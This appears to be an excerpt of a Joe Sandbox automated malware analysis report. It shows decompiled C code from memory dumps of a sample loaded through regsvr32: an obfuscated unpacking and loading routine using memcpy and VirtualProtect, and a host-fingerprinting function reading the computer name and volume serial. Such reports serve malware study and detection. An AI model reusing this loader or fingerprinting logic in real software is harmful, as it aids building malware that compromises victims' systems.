                                          					_t425 = memcpy(_t641 + _t531 + _t531 & 0x00000000 | _t429 ^  *_t678 | _a8, _t629, 0);
                                          					_t673 =  &(_t678[4]);
                                          					_t587 = _t629 + (0 | _v12) + (0 | _v12);
                                          				}
                                          				return _t425;
                                          			}

                                          APIs
                                          • OleInitialize.OLE32(?,?,?,00000000,00000000), ref: 00193811
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd
                                          Similarity
                                          • API ID: Initialize
                                          • String ID:
                                          • API String ID: 2538663250-0
                                          • Opcode ID: c37222093e77ab49d6deb27a8b81837918c5f5959dbe1409ced66bdcc0807996
                                          • Instruction ID: b3bd210fdf52924aa83145b6f5f5f78f9e43cf15db9a95f6241ff58e80e38208
                                          • Opcode Fuzzy Hash: c37222093e77ab49d6deb27a8b81837918c5f5959dbe1409ced66bdcc0807996
                                          • Instruction Fuzzy Hash: 32624C72800A04EFFF049FA0C889B9A7BB5FF24325F0851A9ED5D9E099D77415A4CF68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 67%
                                          			E0019242A(signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi, signed int _a4, char _a36, char _a244) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _t337;
                                          				signed int _t339;
                                          				void* _t346;
                                          				void* _t347;
                                          				signed int _t348;
                                          				signed int _t350;
                                          				signed int _t351;
                                          				signed int _t357;
                                          				signed int _t358;
                                          				signed int _t361;
                                          				void* _t364;
                                          				void* _t365;
                                          				signed int _t366;
                                          				signed int _t368;
                                          				signed int _t371;
                                          				signed int _t374;
                                          				signed int _t377;
                                          				signed int _t379;
                                          				signed int _t380;
                                          				signed int _t382;
                                          				signed int _t384;
                                          				signed int _t388;
                                          				signed int _t391;
                                          				signed int _t392;
                                          				signed int _t394;
                                          				signed int _t397;
                                          				signed int _t398;
                                          				signed int _t400;
                                          				signed int _t404;
                                          				signed int _t405;
                                          				signed int _t408;
                                          				signed int _t409;
                                          				signed int _t413;
                                          				signed int _t415;
                                          				signed int _t417;
                                          				signed int _t420;
                                          				signed int _t423;
                                          				signed int _t428;
                                          				signed int _t431;
                                          				signed int _t433;
                                          				signed int _t454;
                                          				signed int _t457;
                                          				signed int _t479;
                                          				signed int _t481;
                                          				signed int _t484;
                                          				void* _t486;
                                          				signed int _t489;
                                          				void* _t492;
                                          				signed int _t500;
                                          				signed int _t503;
                                          				void* _t516;
                                          				signed int _t523;
                                          				signed int _t526;
                                          				signed int _t529;
                                          				void* _t531;
                                          				signed int _t562;
                                          				void* _t565;
                                          				void* _t568;
                                          				signed int* _t571;
                                          				signed int* _t572;
                                          				signed int* _t574;
                                          				signed int* _t575;
                                          
                                          				_t523 = __esi;
                                          				_t479 = __edi;
                                          				_t450 = __edx;
                                          				_t426 = __ecx;
                                          				_t417 = __ebx;
                                          				if( *(__ebx + 0x4351c7) == 0) {
                                          					_push(__ecx);
                                          					_push(__edx);
                                          					_push(__ebx + 0x4351ef);
                                          					_t337 =  *((intOrPtr*)(__ebx + 0x44106c))();
                                          					_v12 = __edx;
                                          					 *(__ebx + 0x4351c7) =  *(__ebx + 0x4351c7) & 0x00000000;
                                          					 *(__ebx + 0x4351c7) =  *(__ebx + 0x4351c7) | __edx ^ _v12 | _t337;
                                          					_pop( *_t11);
                                          					_t450 = _v12 & 0x00000000 ^ _v12;
                                          					_pop( *_t13);
                                          					_t426 = __ecx & 0x00000000 | _v12;
                                          				}
                                          				if( *(_t417 + 0x4352b0) == 0) {
                                          					_push(_t426);
                                          					_push(_t450);
                                          					if( *(_t417 + 0x4355c5) == 0) {
                                          						_t415 =  *((intOrPtr*)(_t417 + 0x4410a8))(0,  *((intOrPtr*)(_t417 + 0x435914)));
                                          						_v12 = _t523;
                                          						 *(_t417 + 0x4355c5) =  *(_t417 + 0x4355c5) & 0x00000000;
                                          						 *(_t417 + 0x4355c5) =  *(_t417 + 0x4355c5) | _t523 - _v12 | _t415;
                                          						_t523 = _v12;
                                          					}
                                          					_t337 =  *((intOrPtr*)(_t417 + 0x441064))(_t417 + 0x4359f9);
                                          					if( *(_t417 + 0x43523f) == 0) {
                                          						_t413 =  *((intOrPtr*)(_t417 + 0x441060))(_t337);
                                          						 *(_t417 + 0x43523f) =  *(_t417 + 0x43523f) & 0x00000000;
                                          						 *(_t417 + 0x43523f) =  *(_t417 + 0x43523f) | _t479 -  *_t571 | _t413;
                                          						_t479 = _t479;
                                          						_t337 =  *_t571;
                                          						_t571 =  &(_t571[1]);
                                          					}
                                          					 *(_t417 + 0x4352b0) =  *(_t417 + 0x4352b0) & 0x00000000;
                                          					 *(_t417 + 0x4352b0) =  *(_t417 + 0x4352b0) | _t523 ^  *_t571 | _t337;
                                          					_t523 = _t523;
                                          					if( *(_t417 + 0x4351b3) == 0) {
                                          						_t337 =  *((intOrPtr*)(_t417 + 0x4410a8))( *((intOrPtr*)(_t417 + 0x435978)),  *((intOrPtr*)(_t417 + 0x4356a9)));
                                          						_push(_t426);
                                          						 *(_t417 + 0x4351b3) =  *(_t417 + 0x4351b3) & 0x00000000;
                                          						 *(_t417 + 0x4351b3) =  *(_t417 + 0x4351b3) ^ (_t426 & 0x00000000 | _t337);
                                          					}
                                          					_pop( *_t46);
                                          					_t450 = _v12;
                                          					_t426 =  *_t571;
                                          					_t571 =  &(_t571[1]);
                                          					if( *(_t417 + 0x4353c2) == 0) {
                                          						_t337 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x4352a8, _t450, _t426);
                                          						_v12 = _t479;
                                          						 *(_t417 + 0x4353c2) =  *(_t417 + 0x4353c2) & 0x00000000;
                                          						 *(_t417 + 0x4353c2) =  *(_t417 + 0x4353c2) | _t479 - _v12 | _t337;
                                          						_t479 = _v12;
                                          						_t450 =  *_t571;
                                          						_t575 =  &(_t571[1]);
                                          						_t426 =  *_t575;
                                          						_t571 = _t575 - 0xfffffffc;
                                          					}
                                          				}
                                          				_push(_t450);
                                          				_push(_t426);
                                          				_t339 = _t337 & 0x00000000 ^ (_t523 ^  *_t571 | _a4);
                                          				_t526 = _t523;
                                          				if( *(_t417 + 0x43524c) == 0) {
                                          					_t409 =  *((intOrPtr*)(_t417 + 0x44105c))();
                                          					_v12 = _t450;
                                          					 *(_t417 + 0x43524c) =  *(_t417 + 0x43524c) & 0x00000000;
                                          					 *(_t417 + 0x43524c) =  *(_t417 + 0x43524c) ^ (_t450 & 0x00000000 | _t409);
                                          					_t450 = _v12;
                                          					 *_t67 = _t339;
                                          					_t339 = 0 + _v12;
                                          				}
                                          				if( *(_t417 + 0x43539a) == 0) {
                                          					_t404 =  *((intOrPtr*)(_t417 + 0x441044))(_t417 + 0x435020, _t417 + 0x435a31, _t339);
                                          					 *(_t417 + 0x43517e) =  *(_t417 + 0x43517e) & 0x00000000;
                                          					 *(_t417 + 0x43517e) =  *(_t417 + 0x43517e) ^ (_t479 & 0x00000000 | _t404);
                                          					_t516 = _t479;
                                          					_t405 =  *((intOrPtr*)(_t417 + 0x441060))();
                                          					 *(_t417 + 0x43539a) =  *(_t417 + 0x43539a) & 0x00000000;
                                          					 *(_t417 + 0x43539a) =  *(_t417 + 0x43539a) | _t516 -  *_t571 ^ _t405;
                                          					_t479 = _t516;
                                          					if( *(_t417 + 0x4355b1) == 0) {
                                          						_t408 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x435068);
                                          						 *(_t417 + 0x4355b1) =  *(_t417 + 0x4355b1) & 0x00000000;
                                          						 *(_t417 + 0x4355b1) =  *(_t417 + 0x4355b1) ^ (_t426 ^  *_t571 | _t408);
                                          						_t426 = _t426;
                                          					}
                                          					_t339 =  *_t571;
                                          					_t571 = _t571 - 0xfffffffc;
                                          				}
                                          				 *_t93 =  *((intOrPtr*)(_t417 + 0x441044))(_t417 + 0x435669, _t417 + 0x4350e8, _t339 +  *((intOrPtr*)(_t339 + 0x3c)));
                                          				_push(_v12);
                                          				_pop( *_t95);
                                          				_t572 = _t571 - 0xfffffffc;
                                          				_push(0 ^  *_t571);
                                          				_t346 = _t417 + 0x43517b;
                                          				if( *(_t417 + 0x43525c) == 0) {
                                          					_t400 =  *((intOrPtr*)(_t417 + 0x4410a8))( *((intOrPtr*)(_t417 + 0x4352d7)),  *((intOrPtr*)(_t417 + 0x43563d)), _t346);
                                          					_v12 = _t450;
                                          					 *(_t417 + 0x43525c) =  *(_t417 + 0x43525c) & 0x00000000;
                                          					 *(_t417 + 0x43525c) =  *(_t417 + 0x43525c) ^ (_t450 - _v12 | _t400);
                                          					_t450 = _v12;
                                          					_t346 = (_t400 & 0x00000000) +  *_t572;
                                          					_t572 = _t572 - 0xfffffffc;
                                          				}
                                          				_push(_t346);
                                          				_t347 = _t417 + 0x435162;
                                          				if( *(_t417 + 0x4357ee) == 0) {
                                          					_t398 =  *((intOrPtr*)(_t417 + 0x441060))();
                                          					_v12 = _t479;
                                          					 *(_t417 + 0x4357ee) =  *(_t417 + 0x4357ee) & 0x00000000;
                                          					 *(_t417 + 0x4357ee) =  *(_t417 + 0x4357ee) ^ _t479 - _v12 ^ _t398;
                                          					_t479 = _v12;
                                          					 *_t118 = _t347;
                                          					_t347 = 0 + _v12;
                                          				}
                                          				_t348 =  *((intOrPtr*)(_t417 + 0x441044))();
                                          				_v12 = _t526;
                                          				 *(_t417 + 0x43516b) =  *(_t417 + 0x43516b) & 0x00000000;
                                          				 *(_t417 + 0x43516b) =  *(_t417 + 0x43516b) | _t526 - _v12 ^ _t348;
                                          				_t529 = _v12;
                                          				 *_t128 = _t347;
                                          				_t350 = 0 + _v12;
                                          				if( *(_t417 + 0x4357de) == 0) {
                                          					_t397 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x4350d4, _t350);
                                          					 *(_t417 + 0x4357de) =  *(_t417 + 0x4357de) & 0x00000000;
                                          					 *(_t417 + 0x4357de) =  *(_t417 + 0x4357de) | _t450 -  *_t572 ^ _t397;
                                          					_t450 = _t450;
                                          					_pop( *_t137);
                                          					_t350 = _v12;
                                          				}
                                          				_push(_t350);
                                          				_v12 = _t450;
                                          				_t481 = _t479 & 0x00000000 ^ (_t450 ^ _v12 | _t350);
                                          				_t351 =  *(_t481 + 6) & 0x0000ffff;
                                          				if( *(_t417 + 0x435579) == 0) {
                                          					_t394 =  *((intOrPtr*)(_t417 + 0x4410a4))( *((intOrPtr*)(_t417 + 0x4352a4)), _t351);
                                          					 *_t572 = _t529;
                                          					 *(_t417 + 0x435579) = 0 ^ _t394;
                                          					_t529 = 0;
                                          					_t351 = 0 ^  *_t572;
                                          					_t572 =  &(_t572[1]);
                                          				}
                                          				if( *((intOrPtr*)(_t417 + 0x435575)) == 0) {
                                          					if( *(_t417 + 0x43534a) == 0) {
                                          						_t392 =  *((intOrPtr*)(_t417 + 0x441060))(_t351);
                                          						 *(_t417 + 0x43534a) =  *(_t417 + 0x43534a) & 0x00000000;
                                          						 *(_t417 + 0x43534a) =  *(_t417 + 0x43534a) | _t529 -  *_t572 | _t392;
                                          						_t529 = _t529;
                                          						_t351 =  *_t572;
                                          						_t572 = _t572 - 0xfffffffc;
                                          					}
                                          					_push(_t351);
                                          					_push(_t417 + 0x43573a);
                                          					if( *(_t417 + 0x43580e) == 0) {
                                          						_t391 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x43505c);
                                          						_v12 = _t529;
                                          						 *(_t417 + 0x43580e) =  *(_t417 + 0x43580e) & 0x00000000;
                                          						 *(_t417 + 0x43580e) =  *(_t417 + 0x43580e) | _t529 & 0x00000000 | _t391;
                                          						_t529 = _v12;
                                          					}
                                          					_t384 =  *((intOrPtr*)(_t417 + 0x441054))();
                                          					if( *(_t417 + 0x435555) == 0) {
                                          						_t388 =  *((intOrPtr*)(_t417 + 0x441060))(_t384);
                                          						 *(_t417 + 0x435555) =  *(_t417 + 0x435555) & 0x00000000;
                                          						 *(_t417 + 0x435555) =  *(_t417 + 0x435555) ^ _t426 ^  *_t572 ^ _t388;
                                          						_t426 = _t426;
                                          						_t384 = _t388 & 0x00000000 |  *_t572;
                                          						_t572 = _t572 - 0xfffffffc;
                                          					}
                                          					 *_t171 = _t384;
                                          					_push(_v12);
                                          					_pop( *_t173);
                                          					if( *((intOrPtr*)(_t417 + 0x435716)) == 0) {
                                          						 *_t177 =  *((intOrPtr*)(_t417 + 0x44106c))(_t417 + 0x4358e4);
                                          						_push(_v12);
                                          						_pop( *_t179);
                                          					}
                                          					_pop( *_t180);
                                          					_t351 = 0 + _v12;
                                          				}
                                          				_v12 = _t481;
                                          				_v8 = _v8 & 0x00000000;
                                          				_v8 = _v8 ^ (_t481 ^ _v12 | _t351);
                                          				_t484 = _v12;
                                          				if( *(_t417 + 0x43577a) == 0) {
                                          					_t351 =  *((intOrPtr*)(_t417 + 0x4410a8))(0,  *((intOrPtr*)(_t417 + 0x4351e3)));
                                          					 *_t572 = _t484;
                                          					 *(_t417 + 0x43577a) = _t351;
                                          					_t484 = 0;
                                          				}
                                          				_push(_t484);
                                          				if( *(_t417 + 0x435008) == 0) {
                                          					_t351 =  *((intOrPtr*)(_t417 + 0x441058))();
                                          					 *(_t417 + 0x435008) =  *(_t417 + 0x435008) & 0x00000000;
                                          					 *(_t417 + 0x435008) =  *(_t417 + 0x435008) | _t529 & 0x00000000 ^ _t351;
                                          					_t529 = _t529;
                                          				}
                                          				 *_t572 = _t417;
                                          				_t454 = 0 ^  *(_t484 + 0x54);
                                          				_t420 = 0;
                                          				_v12 = _t351;
                                          				_t486 = _t484 & 0x00000000 ^ (_t351 - _v12 |  *(_t420 + 0x4350b0));
                                          				if( *(_t420 + 0x435156) == 0) {
                                          					_t205 = _t420 + 0x435900; // 0x435900
                                          					_t382 =  *((intOrPtr*)(_t420 + 0x44106c))(_t205, _t454);
                                          					_v12 = _t486;
                                          					 *(_t420 + 0x435156) =  *(_t420 + 0x435156) & 0x00000000;
                                          					 *(_t420 + 0x435156) =  *(_t420 + 0x435156) | _t486 ^ _v12 | _t382;
                                          					_t486 = _v12;
                                          					_t454 =  *_t572;
                                          					_t572 =  &(_t572[1]);
                                          				}
                                          				_t531 = _t529 & 0x00000000 | _t420 & 0x00000000 ^ _a4;
                                          				_t423 = _t420;
                                          				_t428 = _t426 & 0x00000000 ^ (_t562 & 0x00000000 | _t454);
                                          				_t565 = _t562;
                                          				if(_t486 == _t531) {
                                          					L50:
                                          					_pop( *_t258);
                                          					if( *(_t423 + 0x4354c6) == 0) {
                                          						_t371 =  *((intOrPtr*)(_t423 + 0x441058))();
                                          						_v12 = _t531;
                                          						 *(_t423 + 0x4354c6) =  *(_t423 + 0x4354c6) & 0x00000000;
                                          						 *(_t423 + 0x4354c6) =  *(_t423 + 0x4354c6) ^ _t531 ^ _v12 ^ _t371;
                                          						_t531 = _v12;
                                          					}
                                          					_t489 =  &_a244;
                                          					_t568 = _t565;
                                          					do {
                                          						_t431 = _t428;
                                          						_v12 = _t423;
                                          						_t433 = _t431 & 0x00000000 | _t423 & 0x00000000 ^  *(_t489 + 0x10);
                                          						_t423 = _v12;
                                          						_t273 = _t423 + 0x4350ed; // 0x4350ed
                                          						_t274 = _t423 + 0x43585d; // 0x43585d
                                          						_t357 =  *((intOrPtr*)(_t423 + 0x441044))(_t274, _t273, _t433, _t489);
                                          						 *(_t423 + 0x435294) =  *(_t423 + 0x435294) & 0x00000000;
                                          						 *(_t423 + 0x435294) =  *(_t423 + 0x435294) | _t489 & 0x00000000 ^ _t357;
                                          						_t492 = _t489;
                                          						_t531 = (_t531 & 0x00000000 | _t428 & 0x00000000 | _a4) +  *((intOrPtr*)(_t492 + 0x14));
                                          						_t358 = memcpy( *((intOrPtr*)(_t492 + 0xc)) +  *(_t423 + 0x4350b0), _t531, _t433 & 0x00000000 |  *_t572);
                                          						_t572 =  &((_t572 - 0xfffffffc)[3]);
                                          						_t428 = 0;
                                          						if( *(_t423 + 0x435944) == 0) {
                                          							_t284 = _t423 + 0x435a21; // 0x435a21
                                          							_t358 =  *((intOrPtr*)(_t423 + 0x441054))(_t284);
                                          							_v12 = _t531;
                                          							 *(_t423 + 0x435944) = 0 ^ _t358;
                                          							_t531 = _v12;
                                          						}
                                          						_pop( *_t289);
                                          						_t489 =  &_a36;
                                          						_t568 = _t568;
                                          						if( *(_t423 + 0x4356c1) == 0) {
                                          							_t358 =  *((intOrPtr*)(_t423 + 0x4410a4))(1);
                                          							_v12 = _t531;
                                          							 *(_t423 + 0x4356c1) = _t358;
                                          							_t531 = _v12;
                                          						}
                                          						_t296 =  &_v8;
                                          						 *_t296 = _v8 - 1;
                                          					} while ( *_t296 != 0);
                                          					if( *(_t423 + 0x435018) == 0) {
                                          						_t358 =  *((intOrPtr*)(_t423 + 0x4410a8))( *((intOrPtr*)(_t423 + 0x43549a)), 9);
                                          						_push(0);
                                          						 *_t572 = _t489;
                                          						 *(_t423 + 0x435018) = 0 ^ _t358;
                                          					}
                                          					_t500 =  *_t572;
                                          					_t574 = _t572 - 0xfffffffc;
                                          					_v12 = _t454;
                                          					_t457 = _v12;
                                          					_t361 = (_t358 & 0x00000000 ^ _t454 ^ _v12 ^  *(_t500 + 0x28)) +  *(_t423 + 0x4350b0);
                                          					if( *(_t423 + 0x435376) == 0) {
                                          						_t308 = _t423 + 0x435524; // 0x435524
                                          						_t368 =  *((intOrPtr*)(_t423 + 0x44106c))(_t361);
                                          						_v12 = _t531;
                                          						 *(_t423 + 0x435376) =  *(_t423 + 0x435376) & 0x00000000;
                                          						 *(_t423 + 0x435376) =  *(_t423 + 0x435376) | _t531 ^ _v12 | _t368;
                                          						_t531 = _v12;
                                          						 *_t317 = _t308;
                                          						_t361 = _t368 & 0x00000000 ^ _v12;
                                          					}
                                          					_v12 = _t500;
                                          					 *(_t423 + 0x4351a7) =  *(_t423 + 0x4351a7) & 0x00000000;
                                          					 *(_t423 + 0x4351a7) =  *(_t423 + 0x4351a7) | _t500 ^ _v12 ^ _t361;
                                          					_t503 = _v12;
                                          					_t535 = _t531 & 0x00000000 ^ (_t361 & 0x00000000 |  *(_t423 + 0x4350b0));
                                          					_t364 = _t361;
                                          					if((_t531 & 0x00000000 ^ (_t361 & 0x00000000 |  *(_t423 + 0x4350b0))) > 0) {
                                          						if( *(_t423 + 0x43536e) == 0) {
                                          							_t366 =  *((intOrPtr*)(_t423 + 0x441070))(0);
                                          							 *(_t423 + 0x43536e) =  *(_t423 + 0x43536e) & 0x00000000;
                                          							 *(_t423 + 0x43536e) =  *(_t423 + 0x43536e) | _t457 ^  *_t574 | _t366;
                                          							_t457 = _t457;
                                          						}
                                          						_t365 = E00192C41(_t423, _t428, _t457, _t503, _t535, _t535); // executed
                                          						_t364 = E001934DA(_t365, _t423, _t428, _t457, _t503, _t535, _t535);
                                          					}
                                          					_pop( *_t333);
                                          					_pop( *_t335);
                                          					return _t364;
                                          				} else {
                                          					if( *(_t423 + 0x435004) == 0) {
                                          						_t380 =  *((intOrPtr*)(_t423 + 0x4410a8))( *((intOrPtr*)(_t423 + 0x4352fb)),  *((intOrPtr*)(_t423 + 0x4354e6)), _t454, _t428);
                                          						_v12 = _t454;
                                          						 *(_t423 + 0x435004) =  *(_t423 + 0x435004) & 0x00000000;
                                          						 *(_t423 + 0x435004) =  *(_t423 + 0x435004) ^ _t454 & 0x00000000 ^ _t380;
                                          						_pop( *_t225);
                                          						_t454 = _v12;
                                          						_pop( *_t227);
                                          						_t428 = _v12 + (_t428 & 0x00000000);
                                          					}
                                          					do {
                                          						asm("movsb");
                                          						_t428 = _t428 - 1;
                                          					} while (_t428 != 0);
                                          					if( *(_t423 + 0x4359f5) == 0) {
                                          						_t230 = _t423 + 0x4356a1; // 0x4356a1
                                          						_t379 =  *((intOrPtr*)(_t423 + 0x441068))(_t230, _t454);
                                          						_v12 = _t531;
                                          						 *(_t423 + 0x4359f5) =  *(_t423 + 0x4359f5) & 0x00000000;
                                          						 *(_t423 + 0x4359f5) =  *(_t423 + 0x4359f5) ^ _t531 - _v12 ^ _t379;
                                          						_t531 = _v12;
                                          						_t454 = _t454 & 0x00000000 |  *_t572;
                                          						_t572 = _t572 - 0xfffffffc;
                                          					}
                                          					_t486 = _t486 & 0x00000000 ^ (_t428 -  *_t572 |  *(_t423 + 0x4350b0));
                                          					_t428 = _t428;
                                          					 *((intOrPtr*)(_t423 + 0x4354d2)) = 0x40;
                                          					_t241 = _t423 + 0x4356e5; // 0x4356e5
                                          					_t242 = _t423 + 0x4352b4; // 0x4352b4
                                          					_t374 =  *((intOrPtr*)(_t423 + 0x441044))(_t242, _t241, _t454);
                                          					 *(_t423 + 0x4351cb) =  *(_t423 + 0x4351cb) & 0x00000000;
                                          					 *(_t423 + 0x4351cb) =  *(_t423 + 0x4351cb) | _t531 ^  *_t572 ^ _t374;
                                          					_t531 = _t531;
                                          					_t454 =  *_t572;
                                          					_t572 = _t572 - 0xfffffffc;
                                          					_t248 = _t423 + 0x4354d2; // 0x4354d2
                                          					_push(2);
                                          					_push(_t454);
                                          					if( *(_t423 + 0x435010) == 0) {
                                          						_t377 =  *((intOrPtr*)(_t423 + 0x441058))();
                                          						_v12 = _t531;
                                          						 *(_t423 + 0x435010) =  *(_t423 + 0x435010) & 0x00000000;
                                          						 *(_t423 + 0x435010) =  *(_t423 + 0x435010) ^ _t531 & 0x00000000 ^ _t377;
                                          						_t531 = _v12;
                                          					}
                                          					VirtualProtect(_t486, ??, ??, ??);
                                          					goto L50;
                                          				}
                                          			}

                                          0x001926ef
                                          0x001926f7
                                          0x001926fe
                                          0x00192704
                                          0x00192709
                                          0x0019270c
                                          0x00192716
                                          0x00192720
                                          0x0019272c
                                          0x00192733
                                          0x00192739
                                          0x0019273a
                                          0x0019273d
                                          0x0019273d
                                          0x00192740
                                          0x00192741
                                          0x0019274c
                                          0x00192751
                                          0x0019275c
                                          0x00192765
                                          0x0019276d
                                          0x00192774
                                          0x0019277a
                                          0x0019277d
                                          0x00192780
                                          0x00192780
                                          0x0019278a
                                          0x00192797
                                          0x0019279a
                                          0x001927a6
                                          0x001927ad
                                          0x001927b3
                                          0x001927ba
                                          0x001927bd
                                          0x001927bd
                                          0x001927c0
                                          0x001927c7
                                          0x001927cf
                                          0x001927d8
                                          0x001927de
                                          0x001927e6
                                          0x001927ed
                                          0x001927f3
                                          0x001927f3
                                          0x001927f6
                                          0x00192803
                                          0x00192806
                                          0x00192812
                                          0x00192819
                                          0x0019281f
                                          0x00192826
                                          0x00192829
                                          0x00192829
                                          0x0019282d
                                          0x00192830
                                          0x00192833
                                          0x00192840
                                          0x00192850
                                          0x00192853
                                          0x00192856
                                          0x00192856
                                          0x0019285e
                                          0x00192861
                                          0x00192861
                                          0x00192864
                                          0x0019286c
                                          0x00192870
                                          0x00192873
                                          0x0019287d
                                          0x00192887
                                          0x0019288f
                                          0x00192896
                                          0x0019289c
                                          0x0019289c
                                          0x0019289d
                                          0x001928a5
                                          0x001928a7
                                          0x001928b3
                                          0x001928ba
                                          0x001928c0
                                          0x001928c0
                                          0x001928c3
                                          0x001928cb
                                          0x001928cd
                                          0x001928ce
                                          0x001928dd
                                          0x001928e9
                                          0x001928ec
                                          0x001928f3
                                          0x001928f9
                                          0x00192901
                                          0x00192908
                                          0x0019290e
                                          0x00192913
                                          0x00192916
                                          0x00192916
                                          0x00192923
                                          0x00192925
                                          0x0019292f
                                          0x00192931
                                          0x00192934
                                          0x00192a43
                                          0x00192a49
                                          0x00192a56
                                          0x00192a58
                                          0x00192a5e
                                          0x00192a66
                                          0x00192a6d
                                          0x00192a73
                                          0x00192a73
                                          0x00192a7f
                                          0x00192a81
                                          0x00192a82
                                          0x00192a8f
                                          0x00192a90
                                          0x00192a9c
                                          0x00192a9e
                                          0x00192aa2
                                          0x00192aa9
                                          0x00192ab0
                                          0x00192abc
                                          0x00192ac3
                                          0x00192ac9
                                          0x00192ad6
                                          0x00192ae2
                                          0x00192ae2
                                          0x00192ae2
                                          0x00192aeb
                                          0x00192aed
                                          0x00192af4
                                          0x00192afa
                                          0x00192b01
                                          0x00192b07
                                          0x00192b07
                                          0x00192b10
                                          0x00192b1f
                                          0x00192b21
                                          0x00192b29
                                          0x00192b2d
                                          0x00192b33
                                          0x00192b3a
                                          0x00192b40
                                          0x00192b40
                                          0x00192b43
                                          0x00192b43
                                          0x00192b43
                                          0x00192b53
                                          0x00192b5d
                                          0x00192b63
                                          0x00192b65
                                          0x00192b6c
                                          0x00192b72
                                          0x00192b75
                                          0x00192b78
                                          0x00192b7b
                                          0x00192b89
                                          0x00192b8c
                                          0x00192b99
                                          0x00192b9c
                                          0x00192ba3
                                          0x00192ba9
                                          0x00192bb1
                                          0x00192bb8
                                          0x00192bbe
                                          0x00192bc7
                                          0x00192bca
                                          0x00192bca
                                          0x00192bcd
                                          0x00192bd5
                                          0x00192bdc
                                          0x00192be2
                                          0x00192bf2
                                          0x00192bf4
                                          0x00192bf8
                                          0x00192c01
                                          0x00192c05
                                          0x00192c11
                                          0x00192c18
                                          0x00192c1e
                                          0x00192c1e
                                          0x00192c20
                                          0x00192c26
                                          0x00192c26
                                          0x00192c2b
                                          0x00192c37
                                          0x00192c3e
                                          0x0019293a
                                          0x00192941
                                          0x00192951
                                          0x00192957
                                          0x0019295f
                                          0x00192966
                                          0x0019296f
                                          0x00192972
                                          0x0019297b
                                          0x0019297e
                                          0x0019297e
                                          0x00192981
                                          0x00192981
                                          0x00192982
                                          0x00192982
                                          0x0019298c
                                          0x0019298f
                                          0x00192996
                                          0x0019299c
                                          0x001929a4
                                          0x001929ab
                                          0x001929b1
                                          0x001929ba
                                          0x001929bd
                                          0x001929bd
                                          0x001929cd
                                          0x001929cf
                                          0x001929d0
                                          0x001929db
                                          0x001929e2
                                          0x001929e9
                                          0x001929f5
                                          0x001929fc
                                          0x00192a02
                                          0x00192a05
                                          0x00192a08
                                          0x00192a0b
                                          0x00192a12
                                          0x00192a14
                                          0x00192a1c
                                          0x00192a1e
                                          0x00192a24
                                          0x00192a2c
                                          0x00192a33
                                          0x00192a39
                                          0x00192a39
                                          0x00192a3d
                                          0x00000000
                                          0x00192a3d

                                          APIs
                                          • VirtualProtect.KERNEL32(00000000,00000000,00000002,004354D2), ref: 00192A3D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 965ff0d501365a58e1c6b305a2901c127183e1ebb994f7cd1b7f885fc6bc8627
                                          • Instruction ID: bef05dcaa0c8a68afca46fac80285af7e9fa93abc53a52cf3e4e9080499825a5
                                          • Opcode Fuzzy Hash: 965ff0d501365a58e1c6b305a2901c127183e1ebb994f7cd1b7f885fc6bc8627
                                          • Instruction Fuzzy Hash: 19425B72810604EFFF04DFA4C98979A7BB5FF54325F0851AADC0DAE049C77856A4CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 94%
                                          			E1000B7A8(WCHAR* __ecx, void* __edx) {
                                          				long _v8;
                                          				long _v12;
                                          				WCHAR* _v16;
                                          				short _v528;
                                          				short _v1040;
                                          				short _v1552;
                                          				WCHAR* _t27;
                                          				signed int _t29;
                                          				void* _t33;
                                          				long _t38;
                                          				WCHAR* _t43;
                                          				WCHAR* _t56;
                                          
                                          				_t44 = __ecx;
                                          				_v8 = _v8 & 0x00000000;
                                          				_t43 = __edx;
                                          				_t56 = __ecx;
                                          				memset(__edx, 0, 0x100);
                                          				_v12 = 0x100;
                                          				GetComputerNameW( &_v528,  &_v12);
                                          				lstrcpynW(_t43,  &_v528, 0x100);
                                          				_t27 = E100095E1(_t44, 0xa88);
                                          				_v16 = _t27;
                                          				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                          				asm("sbb eax, eax");
                                          				_v8 = _v8 &  ~_t29;
                                          				E100085D5( &_v16);
                                          				_t33 = E1000C392(_t43);
                                          				E10009640( &(_t43[E1000C392(_t43)]), 0x100 - _t33, L"%u", _v8);
                                          				lstrcatW(_t43, _t56);
                                          				_t38 = E1000C392(_t43);
                                          				_v12 = _t38;
                                          				CharUpperBuffW(_t43, _t38);
                                          				return E1000D400(_t43, E1000C392(_t43) + _t40, 0);
                                          			}
















                                          APIs
                                          • memset.MSVCRT ref: 1000B7C5
                                          • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 1000B7E0
                                          • lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7EF
                                          • GetVolumeInformationW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B821
                                            • Part of subcall function 10009640: _vsnwprintf.MSVCRT ref: 1000965D
                                          • lstrcatW.KERNEL32 ref: 1000B85A
                                          • CharUpperBuffW.USER32(?,00000000), ref: 1000B86C
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                          • String ID:
